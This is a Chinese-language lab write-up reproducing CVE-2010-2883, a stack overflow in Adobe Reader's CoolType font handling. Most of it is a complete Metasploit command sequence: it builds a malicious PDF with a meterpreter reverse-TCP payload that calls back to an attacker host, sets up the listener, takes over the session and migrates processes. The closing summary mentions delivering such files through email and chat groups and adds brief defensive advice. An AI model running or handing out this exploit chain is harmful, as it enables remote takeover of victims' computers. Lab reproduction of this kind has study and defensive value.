[漏洞復現]CVE-2010-2883 Adobe Reader 打開pdf電腦即刻中招

一、漏洞概述：

CVE-2010-2883漏洞原理：「Adobe Reader在處理CoolType字體文件的sing表時，存在棧溢出漏洞，當打開特製的惡意PDF文件時，可容許任意代碼遠程執行。」

影響版本：Adobe Reader 8.2.4 - 9.3.4

 

二、實驗環境

攻擊機：kali linux 2017

靶機：win 7 + Adobe Reader 9.3

 

三、實驗工具：

連接: https://pan.baidu.com/s/1sQOxcGlb8r095e1oCBipPg 密碼: 5fta

 

四、漏洞復現

在win 7 安裝好Adobe Reader 9.3 

 

 進入kali，使用Metasploit生成PDF木馬文件

打開msf root@kali:~# msfconsole 搜索Adobe滲透模塊 msf > search adobe_cooltype_sing 調用滲透模塊 msf > use exploit/windows/fileformat/adobe_cooltype_sing 查看模塊詳情 msf exploit(adobe_cooltype_sing) > info

 

調用攻擊載荷，反向鏈接到攻擊機 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 設置kali 的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 192.168.190.130 設置本地監聽端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888 設置帶有後門程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME GeekFZ.pdf 執行滲透生成文件 msf exploit(adobe_cooltype_sing) > exploit

 

 將PDF木馬文件拷貝到kali linux的桌面

root@kali:~# cp /root/.msf4/local/GeekFZ.pdf /root/桌面/GeekFZ.pdf

 

 Metasploit開啓shell監聽會話，等待肉雞上線

返回 msf exploit(adobe_cooltype_sing) > back 使用handler模塊 msf > use exploit/multi/handler 回彈一個tcp鏈接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 設置監聽IP地址（跟PDF木馬文件同樣，即kali的IP） msf exploit(handler) > set LHOST 192.168.190.130 設置監聽的端口（跟PDF木馬文件同樣） msf exploit(handler) > set LPORT 8888 開啓監聽 msf exploit(handler) > exploit

 

將PDF木馬文件拷貝到win 7並打開

 

 kali成功獲取shell

 

 到session中鏈接它，並用Meterpreter控制肉雞

查看sessions msf exploit(handler) > sessions 鏈接session msf exploit(handler) > sessions -i 2

 

注：考慮到這個漏洞利用過程，adobe reader會「卡殼」退出，因此須要快速切換到其餘系統進程，這樣會話纔不會丟失。 

獲取進程 meterpreter > ps 切換進程 meterpreter > migrate 3688

 

獲取Dos shell meterpreter > shell

 

 

實驗總結：

能夠看到，最終因爲Adobe Reader 存在CVE-2010-2883這個高危漏洞，致使電腦打開特殊定製的pdf以後，直接變成肉雞。與以前文章中的Office和Flash 0day漏洞相似，真實環境下，不少黑客會利用此方法，結合社會工程學，例如經過誘導郵件、各類論壇、QQ羣、微信羣等多渠道，誘導用戶下載並打開，而只要打開的用戶，就直接中招。

 

在這裏也呼籲你們：日常要很是當心陌生辦公文件，不管是pdf仍是word等，打開以前必定要明確來源，或者用殺毒軟件先殺毒，再打開。另外，就是儘可能保證電腦的軟件處於最新版，這樣才能最大程度下降被攻擊的概率。